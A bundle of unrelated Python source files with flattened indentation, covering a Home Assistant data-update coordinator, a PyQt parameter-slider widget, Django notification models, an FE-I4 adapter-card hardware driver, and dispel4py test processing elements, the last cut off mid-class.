|
|
"""Helpers to help coordinate updates."""
from __future__ import annotations
import asyncio
from datetime import datetime, timedelta
import logging
from time import monotonic
from typing import Any, Awaitable, Callable, Generic, TypeVar
import urllib.error
import aiohttp
import requests
from homeassistant.const import EVENT_HOMEASSISTANT_STOP
from homeassistant.core import CALLBACK_TYPE, Event, HassJob, HomeAssistant, callback
from homeassistant.exceptions import ConfigEntryNotReady
from homeassistant.helpers import entity, event
from homeassistant.util.dt import utcnow
from .debounce import Debouncer
REQUEST_REFRESH_DEFAULT_COOLDOWN = 10
REQUEST_REFRESH_DEFAULT_IMMEDIATE = True
T = TypeVar("T")
# mypy: disallow-any-generics
class UpdateFailed(Exception):
"""Raised when an update has failed."""
class DataUpdateCoordinator(Generic[T]):
"""Class to manage fetching data from single endpoint."""
def __init__(
self,
hass: HomeAssistant,
logger: logging.Logger,
*,
name: str,
update_interval: timedelta | None = None,
update_method: Callable[[], Awaitable[T]] | None = None,
request_refresh_debouncer: Debouncer | None = None,
):
"""Initialize global data updater."""
self.hass = hass
self.logger = logger
self.name = name
self.update_method = update_method
self.update_interval = update_interval
self.data: T | None = None
self._listeners: list[CALLBACK_TYPE] = []
self._job = HassJob(self._handle_refresh_interval)
self._unsub_refresh: CALLBACK_TYPE | None = None
self._request_refresh_task: asyncio.TimerHandle | None = None
self.last_update_success = True
self.last_exception: Exception | None = None
if request_refresh_debouncer is None:
request_refresh_debouncer = Debouncer(
hass,
logger,
cooldown=REQUEST_REFRESH_DEFAULT_COOLDOWN,
immediate=REQUEST_REFRESH_DEFAULT_IMMEDIATE,
function=self.async_refresh,
)
else:
request_refresh_debouncer.function = self.async_refresh
self._debounced_refresh = request_refresh_debouncer
self.hass.bus.async_listen_once(
EVENT_HOMEASSISTANT_STOP, self._async_stop_refresh
)
@callback
def async_add_listener(self, update_callback: CALLBACK_TYPE) -> Callable[[], None]:
"""Listen for data updates."""
schedule_refresh = not self._listeners
self._listeners.append(update_callback)
# This is the first listener, set up interval.
if schedule_refresh:
self._schedule_refresh()
@callback
def remove_listener() -> None:
"""Remove update listener."""
self.async_remove_listener(update_callback)
return remove_listener
@callback
def async_remove_listener(self, update_callback: CALLBACK_TYPE) -> None:
"""Remove data update."""
self._listeners.remove(update_callback)
if not self._listeners and self._unsub_refresh:
self._unsub_refresh()
self._unsub_refresh = None
@callback
def _schedule_refresh(self) -> None:
"""Schedule a refresh."""
if self.update_interval is None:
return
if self._unsub_refresh:
self._unsub_refresh()
self._unsub_refresh = None
# We _floor_ utcnow to create a schedule on a rounded second,
# minimizing the time between the point and the real activation.
# That way we obtain a constant update frequency,
# as long as the update process takes less than a second
self._unsub_refresh = event.async_track_point_in_utc_time(
self.hass,
self._job,
utcnow().replace(microsecond=0) + self.update_interval,
)
async def _handle_refresh_interval(self, _now: datetime) -> None:
"""Handle a refresh interval occurrence."""
self._unsub_refresh = None
await self.async_refresh()
async def async_request_refresh(self) -> None:
"""Request a refresh.
Refresh will wait a bit to see if it can batch them.
"""
await self._debounced_refresh.async_call()
async def _async_update_data(self) -> T | None:
"""Fetch the latest data from the source."""
if self.update_method is None:
raise NotImplementedError("Update method not implemented")
return await self.update_method()
async def async_config_entry_first_refresh(self) -> None:
"""Refresh data for the first time when a config entry is setup.
Will automatically raise ConfigEntryNotReady if the refresh
fails. Additionally logging is handled by config entry setup
to ensure that multiple retries do not cause log spam.
"""
await self._async_refresh(log_failures=False)
if self.last_update_success:
return
ex = ConfigEntryNotReady()
ex.__cause__ = self.last_exception
raise ex
async def async_refresh(self) -> None:
"""Refresh data and log errors."""
await self._async_refresh(log_failures=True)
async def _async_refresh(self, log_failures: bool = True) -> None:
"""Refresh data."""
if self._unsub_refresh:
self._unsub_refresh()
self._unsub_refresh = None
self._debounced_refresh.async_cancel()
start = monotonic()
try:
self.data = await self._async_update_data()
except (asyncio.TimeoutError, requests.exceptions.Timeout) as err:
self.last_exception = err
if self.last_update_success:
if log_failures:
self.logger.error("Timeout fetching %s data", self.name)
self.last_update_success = False
except (aiohttp.ClientError, requests.exceptions.RequestException) as err:
self.last_exception = err
if self.last_update_success:
if log_failures:
self.logger.error("Error requesting %s data: %s", self.name, err)
self.last_update_success = False
except urllib.error.URLError as err:
self.last_exception = err
if self.last_update_success:
if log_failures:
if err.reason == "timed out":
self.logger.error("Timeout fetching %s data", self.name)
else:
self.logger.error(
"Error requesting %s data: %s", self.name, err
)
self.last_update_success = False
except UpdateFailed as err:
self.last_exception = err
if self.last_update_success:
if log_failures:
self.logger.error("Error fetching %s data: %s", self.name, err)
self.last_update_success = False
except NotImplementedError as err:
self.last_exception = err
raise err
except Exception as err: # pylint: disable=broad-except
self.last_exception = err
self.last_update_success = False
if log_failures:
self.logger.exception(
"Unexpected error fetching %s data: %s", self.name, err
)
else:
if not self.last_update_success:
self.last_update_success = True
self.logger.info("Fetching %s data recovered", self.name)
finally:
self.logger.debug(
"Finished fetching %s data in %.3f seconds",
self.name,
monotonic() - start,
)
if self._listeners:
self._schedule_refresh()
for update_callback in self._listeners:
update_callback()
@callback
def async_set_updated_data(self, data: T) -> None:
"""Manually update data, notify listeners and reset refresh interval."""
if self._unsub_refresh:
self._unsub_refresh()
self._unsub_refresh = None
self._debounced_refresh.async_cancel()
self.data = data
self.last_update_success = True
self.logger.debug(
"Manually updated %s data",
self.name,
)
if self._listeners:
self._schedule_refresh()
for update_callback in self._listeners:
update_callback()
@callback
def _async_stop_refresh(self, _: Event) -> None:
"""Stop refreshing when Home Assistant is stopping."""
self.update_interval = None
if self._unsub_refresh:
self._unsub_refresh()
self._unsub_refresh = None
class CoordinatorEntity(entity.Entity):
"""A class for entities using DataUpdateCoordinator."""
def __init__(self, coordinator: DataUpdateCoordinator[Any]) -> None:
"""Create the entity with a DataUpdateCoordinator."""
self.coordinator = coordinator
@property
def should_poll(self) -> bool:
"""No need to poll. Coordinator notifies entity of updates."""
return False
@property
def available(self) -> bool:
"""Return if entity is available."""
return self.coordinator.last_update_success
async def async_added_to_hass(self) -> None:
"""When entity is added to hass."""
await super().async_added_to_hass()
self.async_on_remove(
self.coordinator.async_add_listener(self._handle_coordinator_update)
)
@callback
def _handle_coordinator_update(self) -> None:
"""Handle updated data from the coordinator."""
self.async_write_ha_state()
async def async_update(self) -> None:
"""Update the entity.
Only used by the generic entity update service.
"""
# Ignore manual update requests if the entity is disabled
if not self.enabled:
return
await self.coordinator.async_request_refresh()
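# Illustrative wiring (hedged sketch): `client.fetch`, the entity class and the
# 30-second interval are assumptions for the example, not part of this module;
# `timedelta` comes from datetime.
#
#   async def async_setup_entry(hass, entry, async_add_entities):
#       async def async_update_data():
#           # exceptions raised here drive last_update_success in _async_refresh
#           return await client.fetch()
#
#       coordinator = DataUpdateCoordinator(
#           hass,
#           logger,
#           name="example",
#           update_method=async_update_data,
#           update_interval=timedelta(seconds=30),
#       )
#       await coordinator.async_refresh()
#       async_add_entities([ExampleCoordinatorEntity(coordinator)])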
|
|
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
import pytc
import inspect, math
class Sliders(QWidget):
"""
create sliders for an experiment
"""
def __init__(self, param_name, parent):
super().__init__()
self._exp = parent._exp
self._param_name = param_name
self._fitter = parent._fitter
self._fit_run = False
self._main_box = parent._main_box
self._plot_frame = parent._plot_frame
self.layout()
@property
def name(self):
"""
"""
return self._param_name
def layout(self):
"""
"""
self._main_layout = QGridLayout(self)
self._main_layout.setVerticalSpacing(40)
self._name_label = QLabel(self._param_name, self)
        self._main_layout.addWidget(self._name_label, 0, 0, 1, 2)
self._fix = QCheckBox("Fix?", self)
self._fix.toggle()
self._fix.setChecked(False)
self._fix.stateChanged.connect(self.fix_layout)
self._main_layout.addWidget(self._fix, 1, 0)
self._slider = QSlider(Qt.Horizontal)
self._slider.sliderReleased.connect(self.update_val)
self._main_layout.addWidget(self._slider, 1, 1)
self._slider.setMinimumWidth(100)
self._param_guess_label = QLabel("", self)
self._main_layout.addWidget(self._param_guess_label, 1, 2)
self.bounds()
self._fix_int = QLineEdit(self)
self._main_layout.addWidget(self._fix_int, 1, 3)
self._fix_int.setText(str(1))
self._fix_int.returnPressed.connect(self.fix)
self._fix_int.hide()
self._update_min_label = QLabel("min: ", self)
self._main_layout.addWidget(self._update_min_label, 1, 4)
self._update_min = QLineEdit(self)
self._main_layout.addWidget(self._update_min, 1, 5)
self._update_min.returnPressed.connect(self.min_bounds)
self._update_min.setFixedWidth(60)
self._update_max_label = QLabel("max: ", self)
self._main_layout.addWidget(self._update_max_label, 1, 6)
self._update_max = QLineEdit(self)
self._main_layout.addWidget(self._update_max, 1, 7)
self._update_max.returnPressed.connect(self.max_bounds)
self._update_max.setFixedWidth(60)
@pyqtSlot()
def set_fit_true(self):
"""
"""
self._fit_run = True
def check_if_fit(self):
"""
if a fit has been run, and a slider is changed, change all parameters back to guesses in slider widgets
"""
if self._fit_run:
self._fitter.guess_to_value()
self._fit_run = False
self._plot_frame.update()
def fix_layout(self, state):
"""
initial parameter fix and updating whether slider/fixed int is hidden or shown
"""
if state == Qt.Checked:
# change widget views
self._fix_int.show()
self._slider.hide()
self._param_guess_label.hide()
self._fitter.update_fixed(self._param_name, int(self._fix_int.text()), self._exp)
self.check_if_fit()
else:
#change widget views
self._fix_int.hide()
self._slider.show()
self._param_guess_label.show()
self._fitter.update_fixed(self._param_name, None, self._exp)
def fix(self):
"""
update fixed value when enter/return key pressed
"""
try:
self._fitter.update_fixed(self._param_name, int(self._fix_int.text()), self._exp)
self.check_if_fit()
        except ValueError:
            # ignore non-numeric input; keep the previous fixed value
            pass
def update_val(self):
"""
update value for parameter based on slider value
"""
value = int(self._slider.value())
# transform values back
if self._range_diff < 10:
value /= 10
elif self._range_diff < 100000:
value *= 100
elif self._range_diff < 100000000:
value = 10 ** value
if value != 0:
# if guess update, update parameter as well for plot
self._fitter.update_guess(self._param_name, value, self._exp)
self._fitter.update_value(self._param_name, value, self._exp)
self._param_guess_label.setText(str(value))
self.check_if_fit()
def transform_init(self, val):
"""
transform values for use in slider
"""
        if self._range_diff < 10:
            new_val = val * 10
        elif self._range_diff < 100000:
            new_val = val / 100
        elif self._range_diff < 100000000:
            new_val = math.log10(val)
        else:
            # very large ranges pass through unchanged; without this branch
            # new_val would be unbound
            new_val = val
        return new_val
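    # Worked example (illustrative): QSlider only stores integers, so for a
    # range difference under 10 a guess of 0.5 is stored as position 5
    # (val * 10) and update_val() divides by 10 to recover 0.5; ranges up to
    # 1e5 are stored as val / 100 and inverted with value * 100, and larger
    # ranges use log10, inverted with 10 ** value.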
def min_bounds(self):
"""
update the minimum bounds when enter/return key pressed
"""
try:
self._min = int(self._update_min.text())
# make sure K min bound isn't negative
if "K" in self._param_name and self._min < 0:
self._min = 1
# set new range
self._range_diff = self._max - self._min
# if range has significantly changed, update value transformations
self._slider_max = self.transform_init(self._max)
self._slider_min = self.transform_init(self._min)
# set slider min
self._slider.setMinimum(self._slider_min)
self.update_bounds()
        except ValueError:
            # ignore non-numeric input
            pass
def max_bounds(self):
"""
update maximum bounds when enter/return key pressed
"""
try:
self._max = int(self._update_max.text())
# set new range
self._range_diff = self._max - self._min
# if range has significantly changed, update the value transformations
self._slider_max = self.transform_init(self._max)
self._slider_min = self.transform_init(self._min)
# set slider max
self._slider.setMaximum(self._slider_max)
self.update_bounds()
        except ValueError:
            # ignore non-numeric input
            pass
def bounds(self):
"""
for anything specific to child class
"""
# transform values based on parameter to allow floats to pass to fitter and
# make sliders easier to use, QtSlider only allows integers
self._range_diff = self._max - self._min
min_range = self.transform_init(self._min)
max_range = self.transform_init(self._max)
self._slider.setMinimum(min_range)
self._slider.setMaximum(max_range)
def update_bounds(self):
"""
update min/max bounds and check if range needs to be updated as well
"""
pass
|
|
from __future__ import unicode_literals
from __future__ import print_function
import base64
from django.db import models
from django.db.models.query import QuerySet
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured, ObjectDoesNotExist
from django.utils.translation import ugettext_lazy as _
from django.utils.translation import get_language, activate
from django.utils.encoding import python_2_unicode_compatible
from django.utils.six.moves import cPickle as pickle # pylint: disable-msg=F
from .compat import AUTH_USER_MODEL
from notification import backends
DEFAULT_QUEUE_ALL = False
QUEUE_ALL = getattr(settings, "NOTIFICATION_QUEUE_ALL", DEFAULT_QUEUE_ALL)
NOTIFICATION_BACKENDS = backends.load_backends()
NOTICE_MEDIA, NOTICE_MEDIA_DEFAULTS = backends.load_media_defaults(
backends=NOTIFICATION_BACKENDS
)
class LanguageStoreNotAvailable(Exception):
pass
def create_notice_type(label, display, description, **kwargs):
NoticeType.create(label, display, description, **kwargs)
@python_2_unicode_compatible
class NoticeType(models.Model):
label = models.CharField(_("label"), max_length=40)
display = models.CharField(_("display"), max_length=50)
description = models.CharField(_("description"), max_length=100)
# by default only on for media with sensitivity less than or equal to this number
default = models.IntegerField(_("default"))
def __str__(self):
return self.label
class Meta:
verbose_name = _("notice type")
verbose_name_plural = _("notice types")
@classmethod
def create(cls, label, display, description, default=2, verbosity=1):
"""
Creates a new NoticeType.
        This is intended to be used by other apps as a post_syncdb management step.
"""
try:
notice_type = cls._default_manager.get(label=label)
updated = False
if display != notice_type.display:
notice_type.display = display
updated = True
if description != notice_type.description:
notice_type.description = description
updated = True
if default != notice_type.default:
notice_type.default = default
updated = True
if updated:
notice_type.save()
if verbosity > 1:
print("Updated %s NoticeType" % label)
except cls.DoesNotExist:
cls(label=label, display=display, description=description, default=default).save()
if verbosity > 1:
print("Created %s NoticeType" % label)
class NoticeSetting(models.Model):
"""
Indicates, for a given user, whether to send notifications
of a given type to a given medium.
"""
user = models.ForeignKey(AUTH_USER_MODEL, verbose_name=_("user"))
notice_type = models.ForeignKey(NoticeType, verbose_name=_("notice type"))
medium = models.CharField(_("medium"), max_length=1, choices=NOTICE_MEDIA)
send = models.BooleanField(_("send"))
class Meta:
verbose_name = _("notice setting")
verbose_name_plural = _("notice settings")
unique_together = ("user", "notice_type", "medium")
@classmethod
def for_user(cls, user, notice_type, medium):
try:
return cls._default_manager.get(user=user, notice_type=notice_type, medium=medium)
except cls.DoesNotExist:
default = (NOTICE_MEDIA_DEFAULTS[medium] <= notice_type.default)
setting = cls(user=user, notice_type=notice_type, medium=medium, send=default)
setting.save()
return setting
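    # Worked example (illustrative): if NOTICE_MEDIA_DEFAULTS maps this medium
    # to sensitivity 1 and the NoticeType has default=2, then 1 <= 2 and the
    # setting is created with send=True; a medium with sensitivity 3 would
    # default to send=False.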
class NoticeQueueBatch(models.Model):
"""
A queued notice.
Denormalized data for a notice.
"""
pickled_data = models.TextField()
def get_notification_language(user):
"""
Returns site-specific notification language for this user. Raises
LanguageStoreNotAvailable if this site does not use translated
notifications.
"""
if getattr(settings, "NOTIFICATION_LANGUAGE_MODULE", False):
try:
app_label, model_name = settings.NOTIFICATION_LANGUAGE_MODULE.split(".")
model = models.get_model(app_label, model_name)
# pylint: disable-msg=W0212
language_model = model._default_manager.get(user__id__exact=user.id)
if hasattr(language_model, "language"):
return language_model.language
        except (ImportError, ImproperlyConfigured, ObjectDoesNotExist):
raise LanguageStoreNotAvailable
raise LanguageStoreNotAvailable
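# Illustrative configuration (hedged sketch): NOTIFICATION_LANGUAGE_MODULE
# names an "app_label.ModelName" whose instances link to a user and carry a
# `language` attribute. A hypothetical settings.py entry:
#
#   NOTIFICATION_LANGUAGE_MODULE = "profiles.Profile"
#
# where profiles.Profile has a foreign key to the user model and a
# `language` CharField.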
def send_now(users, label, extra_context=None, sender=None):
"""
Creates a new notice.
This is intended to be how other apps create new notices.
notification.send(user, "friends_invite_sent", {
"spam": "eggs",
"foo": "bar",
    })
"""
sent = False
if extra_context is None:
extra_context = {}
notice_type = NoticeType.objects.get(label=label)
current_language = get_language()
for user in users:
# get user language for user from language store defined in
# NOTIFICATION_LANGUAGE_MODULE setting
try:
language = get_notification_language(user)
except LanguageStoreNotAvailable:
language = None
if language is not None:
# activate the user's language
activate(language)
for backend in NOTIFICATION_BACKENDS.values():
if backend.can_send(user, notice_type):
backend.deliver(user, sender, notice_type, extra_context)
sent = True
# reset environment to original language
activate(current_language)
return sent
def send(*args, **kwargs):
"""
A basic interface around both queue and send_now. This honors a global
flag NOTIFICATION_QUEUE_ALL that helps determine whether all calls should
be queued or not. A per call ``queue`` or ``now`` keyword argument can be
used to always override the default global behavior.
"""
queue_flag = kwargs.pop("queue", False)
now_flag = kwargs.pop("now", False)
assert not (queue_flag and now_flag), "'queue' and 'now' cannot both be True."
if queue_flag:
return queue(*args, **kwargs)
elif now_flag:
return send_now(*args, **kwargs)
else:
if QUEUE_ALL:
return queue(*args, **kwargs)
else:
return send_now(*args, **kwargs)
def queue(users, label, extra_context=None, sender=None):
"""
Queue the notification in NoticeQueueBatch. This allows for large amounts
    of user notifications to be deferred to a separate process running outside
the webserver.
"""
if extra_context is None:
extra_context = {}
if isinstance(users, QuerySet):
users = [row["pk"] for row in users.values("pk")]
else:
users = [user.pk for user in users]
notices = []
for user in users:
notices.append((user, label, extra_context, sender))
NoticeQueueBatch(pickled_data=base64.b64encode(pickle.dumps(notices))).save()
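# Illustrative consumer (hedged sketch): queue() defers delivery to a worker
# running outside the web server. A minimal worker could unpickle each batch
# and replay it through send_now(); the get_user_model() lookup is an
# assumption for the example.
#
#   from django.contrib.auth import get_user_model
#
#   def emit_batches():
#       User = get_user_model()
#       for batch in NoticeQueueBatch.objects.all():
#           notices = pickle.loads(base64.b64decode(batch.pickled_data))
#           for user_pk, label, extra_context, sender in notices:
#               send_now([User.objects.get(pk=user_pk)], label, extra_context,
#                        sender)
#           batch.delete()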
|
|
#
# ------------------------------------------------------------
# Copyright (c) All rights reserved
# SiLab, Institute of Physics, University of Bonn
# ------------------------------------------------------------
#
import logging
from struct import pack, unpack_from, calcsize
from array import array
from collections import OrderedDict
from math import log
import string
from basil.HL.HardwareLayer import HardwareLayer
from basil.HL.FEI4AdapterCard import AdcMax1239, Eeprom24Lc128, Fei4Dcs
class DacMax5380(HardwareLayer):
'''DAC MAX5380
Write current limit (QMAC).
'''
MAX_5380_ADD = 0x60
def __init__(self, intf, conf):
super(DacMax5380, self).__init__(intf, conf)
self._base_addr = conf['base_addr']
def _set_dac_value(self, channel, value):
'''Write DAC
'''
self._intf.write(self._base_addr + self.MAX_5380_ADD, array('B', pack('B', value)))
class DacDs4424(HardwareLayer):
'''DAC DS4424
Write voltage (QMAC).
'''
DS_4424_ADD = 0x20
def __init__(self, intf, conf):
super(DacDs4424, self).__init__(intf, conf)
self._base_addr = conf['base_addr']
def _set_dac_value(self, channel, value):
'''Write DAC
'''
# DAC value cannot be -128
if value == -128:
value = -127
if value < 0:
sign = 1
else:
sign = 0
value = (sign << 7) | (0x7F & abs(value))
self._intf.write(self._base_addr + self.DS_4424_ADD, array('B', pack('BB', channel, value)))
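    # Worked example (illustrative): the DS4424 register uses sign-magnitude
    # encoding, so value = -5 becomes (1 << 7) | (0x7F & 5) = 0x85 while
    # value = +5 stays 0x05; -128 has no one-byte sign-magnitude counterpart,
    # hence the clamp to -127 above.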
class FEI4QuadModuleAdapterCard(AdcMax1239, DacDs4424, DacMax5380, Eeprom24Lc128, Fei4Dcs):
'''FEI4 Quad Module Adapter Card interface
'''
# EEPROM data V2
HEADER_V2 = 0xa102
CAL_DATA_CH_V2_FORMAT = '8sddddddddddddddd'
CAL_DATA_ADDR = Fei4Dcs.ID_ADDR + calcsize(Fei4Dcs.ID_FORMAT)
CAL_DATA_V2_FORMAT = '<' + 4 * CAL_DATA_CH_V2_FORMAT
# NTC
T_KELVIN_0 = 273.15
T_KELVIN_25 = (25.0 + T_KELVIN_0)
# Channel mappings
_ch_map = {
'CH1':
{'DACV': {'channel': 0xf8},
'ADCV': {'channel': 0},
'ADCI': {'channel': 1},
'NTC': {'channel': 8}
},
'CH2':
{'DACV': {'channel': 0xf9},
'ADCV': {'channel': 2},
'ADCI': {'channel': 3},
'NTC': {'channel': 9}
},
'CH3':
{'DACV': {'channel': 0xfa},
'ADCV': {'channel': 4},
'ADCI': {'channel': 5},
'NTC': {'channel': 10}
},
'CH4':
{'DACV': {'channel': 0xfb},
'ADCV': {'channel': 6},
'ADCI': {'channel': 7},
'NTC': {'channel': 11}
}
}
def __init__(self, intf, conf):
super(FEI4QuadModuleAdapterCard, self).__init__(intf, conf)
# Channel calibrations
self._ch_cal = OrderedDict([
('CH1',
{'name': '',
'default': 0.0,
'DACV': {'offset': 1.8, 'gain': 0.00397},
'ADCV': {'offset': 0.0, 'gain': 1000.0},
'DACI': {'offset': 0.0, 'gain': 0.0078125},
'ADCI': {'offset': 0.0, 'gain': 1000.0, 'iq_offset': 1.5, 'iq_gain': 7.0},
'NTC': {'B_NTC': 3425.0, 'R_NTC_25': 10000.0, 'R1': 39200.0, 'R2': 4750.0, 'R4': 10000.0, 'VREF': 4.5}
}),
('CH2',
{'name': '',
'default': 0.0,
'DACV': {'offset': 1.8, 'gain': 0.00397},
'ADCV': {'offset': 0.0, 'gain': 1000.0},
'DACI': {'offset': 0.0, 'gain': 0.0078125},
'ADCI': {'offset': 0.0, 'gain': 1000.0, 'iq_offset': 1.5, 'iq_gain': 7.0},
'NTC': {'B_NTC': 3425.0, 'R_NTC_25': 10000.0, 'R1': 39200.0, 'R2': 4750.0, 'R4': 10000.0, 'VREF': 4.5}
}),
('CH3',
{'name': '',
'default': 0.0,
'DACV': {'offset': 1.8, 'gain': 0.00397},
'ADCV': {'offset': 0.0, 'gain': 1000.0},
'DACI': {'offset': 0.0, 'gain': 0.0078125},
'ADCI': {'offset': 0.0, 'gain': 1000.0, 'iq_offset': 1.5, 'iq_gain': 7.0},
'NTC': {'B_NTC': 3425.0, 'R_NTC_25': 10000.0, 'R1': 39200.0, 'R2': 4750.0, 'R4': 10000.0, 'VREF': 4.5}
}),
('CH4',
{'name': '',
'default': 0.0,
'DACV': {'offset': 1.8, 'gain': 0.00397},
'ADCV': {'offset': 0.0, 'gain': 1000.0},
'DACI': {'offset': 0.0, 'gain': 0.0078125},
'ADCI': {'offset': 0.0, 'gain': 1000.0, 'iq_offset': 1.5, 'iq_gain': 7.0},
'NTC': {'B_NTC': 3425.0, 'R_NTC_25': 10000.0, 'R1': 39200.0, 'R2': 4750.0, 'R4': 10000.0, 'VREF': 4.5}
})]
)
def init(self):
self._setup_adc(self.SETUP_FLAGS_BI)
self.read_eeprom_calibration()
self.set_current_limit('CH1', 1.0)
        logging.info('Found adapter card: %s with ID %s', 'Quad Module Adapter Card', self.get_id())
def read_eeprom_calibration(self, temperature=False): # use default values for temperature, EEPROM values are usually not calibrated and random
'''Reading EEPROM calibration for power regulators and temperature
'''
header = self.get_format()
if header == self.HEADER_V2:
data = self._read_eeprom(self.CAL_DATA_ADDR, size=calcsize(self.CAL_DATA_V2_FORMAT))
            for idx, channel in enumerate(self._ch_cal):
ch_data = data[idx * calcsize(self.CAL_DATA_CH_V2_FORMAT):(idx + 1) * calcsize(self.CAL_DATA_CH_V2_FORMAT)]
values = unpack_from(self.CAL_DATA_CH_V2_FORMAT, ch_data)
self._ch_cal[channel]['name'] = "".join([c for c in values[0] if (c in string.printable)]) # values[0].strip()
self._ch_cal[channel]['default'] = values[1]
self._ch_cal[channel]['ADCI']['gain'] = values[2]
self._ch_cal[channel]['ADCI']['offset'] = values[3]
self._ch_cal[channel]['ADCI']['iq_gain'] = values[4]
self._ch_cal[channel]['ADCI']['iq_offset'] = values[5]
self._ch_cal[channel]['ADCV']['gain'] = values[6]
self._ch_cal[channel]['ADCV']['offset'] = values[7]
self._ch_cal[channel]['DACV']['gain'] = values[8]
self._ch_cal[channel]['DACV']['offset'] = values[9]
if temperature:
self._ch_cal[channel]['NTC']['B_NTC'] = values[10]
self._ch_cal[channel]['NTC']['R1'] = values[11]
self._ch_cal[channel]['NTC']['R2'] = values[12]
self._ch_cal[channel]['NTC']['R4'] = values[13]
self._ch_cal[channel]['NTC']['R_NTC_25'] = values[14]
self._ch_cal[channel]['NTC']['VREF'] = values[15]
else:
raise ValueError('EEPROM data format not supported (header: %s)' % header)
def get_temperature(self, channel):
'''Reading temperature
'''
# NTC type SEMITEC 103KT1608 http://www.semitec.co.jp/english/products/pdf/KT_Thermistor.pdf
#
# R_NTC = R_25 * exp(B_NTC * (1/T - 1/T_25))
#
# R_NTC measured NTC resistance
# R_NTC_25 resistance @ 25C
# B_NTC temperature coefficient
        # T current temperature (Kelvin)
        # T_25 298.15 K (25C)
#
# B_NTC NTC 'b' coefficient, NTC Semitec 103KT1608-1P
# R_NTC_25 NTC 25C resistance, NTC Semitec 103KT1608-1P
# R1 resistor value for NTC voltage divider
# R2 value of R2 in the reference voltage divider
# R4 value of R4 in the reference voltage divider
# VREF supply voltage of the resistor bridge
#
# Note:
# new NTC on FE-I4
# NTC type TDK NTCG163JF103FT1
#
kwargs = self._ch_map[channel]['NTC']
temp_raw = self._get_adc_value(**kwargs)
v_adc = ((temp_raw - self._ch_cal[channel]['ADCV']['offset']) / self._ch_cal[channel]['ADCV']['gain']) # voltage, VDDA1
k = self._ch_cal[channel]['NTC']['R4'] / (self._ch_cal[channel]['NTC']['R2'] + self._ch_cal[channel]['NTC']['R4']) # reference voltage divider
r_ntc = self._ch_cal[channel]['NTC']['R1'] * (k - v_adc / self._ch_cal[channel]['NTC']['VREF']) / (1 - k + v_adc / self._ch_cal[channel]['NTC']['VREF']) # NTC resistance
return (self._ch_cal[channel]['NTC']['B_NTC'] * self.T_KELVIN_25) / (self._ch_cal[channel]['NTC']['B_NTC'] + self.T_KELVIN_25 * log(r_ntc / self._ch_cal[channel]['NTC']['R_NTC_25'])) - self.T_KELVIN_0 # NTC temperature
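    # Worked check (illustrative): inverting R_NTC = R_25 * exp(B * (1/T - 1/T_25))
    # gives T = B * T_25 / (B + T_25 * ln(R_NTC / R_25)), which is the return
    # expression above. With the defaults (B = 3425 K, R_25 = 10 kOhm), a
    # measured r_ntc of 10 kOhm zeroes the log term, so T = T_25 = 298.15 K,
    # i.e. 25.0 C after subtracting T_KELVIN_0.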
def set_current_limit(self, channel, value, unit='A'):
'''Setting current limit
Note: same limit for all channels.
'''
dac_offset = self._ch_cal[channel]['DACI']['offset']
dac_gain = self._ch_cal[channel]['DACI']['gain']
        if unit == 'raw':
            pass  # value is already a raw DAC count
elif unit == 'A':
value = int((value - dac_offset) / dac_gain)
elif unit == 'mA':
value = int((value / 1000 - dac_offset) / dac_gain)
else:
raise TypeError("Invalid unit type.")
DacMax5380._set_dac_value(self, channel, value)
|
|
# Copyright (c) The University of Edinburgh 2014
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Test PEs
'''
Example PEs for test workflows, implementing various patterns.
'''
from dispel4py.core import GenericPE
from dispel4py.base import IterativePE, ProducerPE, ConsumerPE
import random
import time
from collections import defaultdict
class TestProducer(GenericPE):
'''
This PE produces a range of numbers
'''
def __init__(self, numOutputs=1):
GenericPE.__init__(self)
if numOutputs == 1:
self._add_output('output', tuple_type=['number'])
else:
for i in range(numOutputs):
self._add_output('output%s' % i, tuple_type=['number'])
self.counter = 0
self.outputnames = list(self.outputconnections.keys())
def _process(self, inputs):
self.counter += 1
result = {}
for output in self.outputnames:
result[output] = self.counter
# self.log("Writing out %s" % result)
return result
class NumberProducer(GenericPE):
def __init__(self, numIterations=1):
GenericPE.__init__(self)
self._add_output('output', tuple_type=['number'])
self.counter = 0
self.numIterations = numIterations
def _process(self, inputs):
for i in range(self.numIterations):
self.write('output', [self.counter*i+i])
self.counter += 1
class IntegerProducer(ProducerPE):
def __init__(self, start, limit):
ProducerPE.__init__(self)
self.start = start
self.limit = limit
def _process(self, inputs):
for i in range(self.start, self.limit):
self.write('output', i)
class TestOneInOneOut(GenericPE):
'''
This PE outputs the input data.
'''
def __init__(self):
GenericPE.__init__(self)
self._add_input('input')
self._add_output('output')
def setInputTypes(self, inputtypes):
self.inputconnections['input']['type'] = inputtypes['input']
self.outputconnections['output']['type'] = inputtypes['input']
def process(self, inputs):
# self.log('Processing inputs %s' % inputs)
return {'output': inputs['input']}
class TestIterative(IterativePE):
'''
This PE outputs the input data.
'''
def __init__(self):
IterativePE.__init__(self)
def _process(self, data):
return data
class TestDelayOneInOneOut(GenericPE):
'''
This PE outputs the input data.
'''
def __init__(self, delay=1):
GenericPE.__init__(self)
self._add_input('input')
self._add_output('output', tuple_type=['number'])
self.delay = delay
def process(self, inputs):
# self.log('Processing inputs %s' % inputs)
time.sleep(self.delay)
return {'output': inputs['input']}
class TestOneInOneOutWriter(GenericPE):
'''
This PE copies the input to an output, but it uses the write method.
    Remember that the write method allows producing more than one output
    block within one processing step.
'''
def __init__(self):
GenericPE.__init__(self)
self._add_input('input')
self._add_output('output', tuple_type=['number'])
def process(self, inputs):
self.write('output', inputs['input'])
class TestTwoInOneOut(GenericPE):
'''
    This PE takes two inputs and merges the data into one output string.
'''
def __init__(self):
GenericPE.__init__(self)
self._add_input('input0')
self._add_input('input1')
self._add_output('output', tuple_type=['result'])
def process(self, inputs):
# print '%s: inputs %s' % (self.id, inputs)
result = ''
for inp in self.inputconnections:
if inp in inputs:
result += '%s' % (inputs[inp])
if result:
# print '%s: result %s' % (self.id, result)
return {'output': result}
class TestMultiProducer(GenericPE):
def __init__(self, num_output=10):
GenericPE.__init__(self)
self._add_output('output')
self.num_output = num_output
def _process(self, inputs):
for i in range(self.num_output):
self.write('output', i)
class PrintDataConsumer(ConsumerPE):
def __init__(self):
